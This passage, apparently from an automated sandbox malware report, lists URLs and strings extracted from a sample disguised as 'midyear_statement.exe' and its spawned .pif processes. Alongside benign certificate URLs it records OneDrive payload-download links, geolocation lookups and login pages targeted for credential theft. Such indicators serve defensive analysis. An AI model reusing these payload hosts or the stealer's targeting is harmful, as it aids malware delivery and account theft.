Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: bhv348F.tmp.27.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv348F.tmp.27.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv348F.tmp.27.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: wkrriuhD.pif, 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.0000000012491000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1622995189.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpl
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv348F.tmp.27.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv348F.tmp.27.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv348F.tmp.27.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: bhv348F.tmp.27.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv348F.tmp.27.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comppData
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wkrriuhD.pif, 0000001B.00000002.1406015576.0000000000193000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: midyear_statement.exe, midyear_statement.exe, 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1381770717.0000000016137000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1382468437.0000000016170000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1380482770.0000000015C00000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, wkrriuhD.pif, 00000018.00000000.1358434050.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001B.00000000.1383271733.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001C.00000000.1383573996.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001D.00000000.1384411850.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001F.00000002.1566764474.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 00000021.00000000.1636440948.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif.0.dr String found in binary or memory: http://www.pmail.com
Source: bhv348F.tmp.27.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aborlw.sn.files.1drv.com/
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aborlw.sn.files.1drv.com/o
Source: Dhuirrkw.PIF, 0000001E.00000003.1545101196.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mLOg16uNX2Id3t-nfFLVYL7CZhAgTRemSr1q_NX-Mvx_fpOOS9Dz7js9NACEXeYp5
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mXBt2sSJKJZHlLzI8sH3PFmgRqsPoY_FaTasOJSi4WNTk8bd6AgZ1TzwzQWZ2uDij
Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mdIO5pciNH8fpwGOAAIADTo3pXjwRKPU-X6-J-zpDME1cfDB5-C-zJvJ0Zyx9NPNN
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616710283.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mhPCChdz-WmirIkiDV2ww7X8Bbd2o2c6Warvjl_dk_jMmN6VWuryzdoRm3kPHX80_
Source: midyear_statement.exe, 00000000.00000003.1292113599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abpoxw.sn.files.1drv.com/
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4mVdi6rp2qkaaDX5Txipl4hmgaKma0en0K10OdbofbDqqNgddkNvfFr34Mxc3bQcF3
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6cd0Kw
Source: Dhuirrkw.PIF, 0000001E.00000002.1567523437.00000000007E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJVsre
Source: midyear_statement.exe, 00000000.00000002.1380482770.0000000015BD6000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1292113599.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1yWLZH
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6c
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.0000000000818000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJ
Source: midyear_statement.exe, 00000000.00000003.1292113599.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1y
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abqscw.sn.files.1drv.com/
Source: midyear_statement.exe, 00000000.00000003.1219564986.00000000008FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abqscw.sn.files.1drv.com/y4m-zYwpFACL5iXnxCgcfUGrba1rEn19VhjL7w-TerMTn_xp_gGpLreK-PlTDk9AFPA
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1598043310.0000000000838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abqscw.sn.files.1drv.com/y4mM5VAFczkoUgXiRkT2NbXnlBwvzcPuKz5AwJErjUwbkEuoWmzy8jSXGy266gPIcJH
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abqscw.sn.files.1drv.com/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX-g6M
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abqscw.sn.files.1drv.com:443/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX
Source: bhv348F.tmp.27.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv348F.tmp.27.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv348F.tmp.27.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv348F.tmp.27.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv348F.tmp.27.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: bhv348F.tmp.27.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv348F.tmp.27.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: bhv348F.tmp.27.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv348F.tmp.27.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv348F.tmp.27.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv348F.tmp.27.dr String found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58
Source: bhv348F.tmp.27.dr String found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05
Source: bhv348F.tmp.27.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: bhv348F.tmp.27.dr String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb
Source: bhv348F.tmp.27.dr String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9
Source: bhv348F.tmp.27.dr String found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?23ecc2fb73d617d9826364f47d1067db
Source: bhv348F.tmp.27.dr String found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?7bac4e73e9b20fcc41dc97447167937d
Source: bhv348F.tmp.27.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/W
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/X
Source: Dhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/a
Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/g
Source: bhv348F.tmp.27.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv348F.tmp.27.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv348F.tmp.27.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wkrriuhD.pif String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv348F.tmp.27.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv348F.tmp.27.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv348F.tmp.27.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv348F.tmp.27.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-07-50-22/PreSignInSettingsConfig.json
Source: bhv348F.tmp.27.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=d75433bcf1f9312f1975
Source: bhv348F.tmp.27.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=ad62f4
Source: Dhuirrkw.PIF, 00000020.00000002.1638568341.0000000000808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.co
Source: Dhuirrkw.PIF, 00000020.00000002.1638568341.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
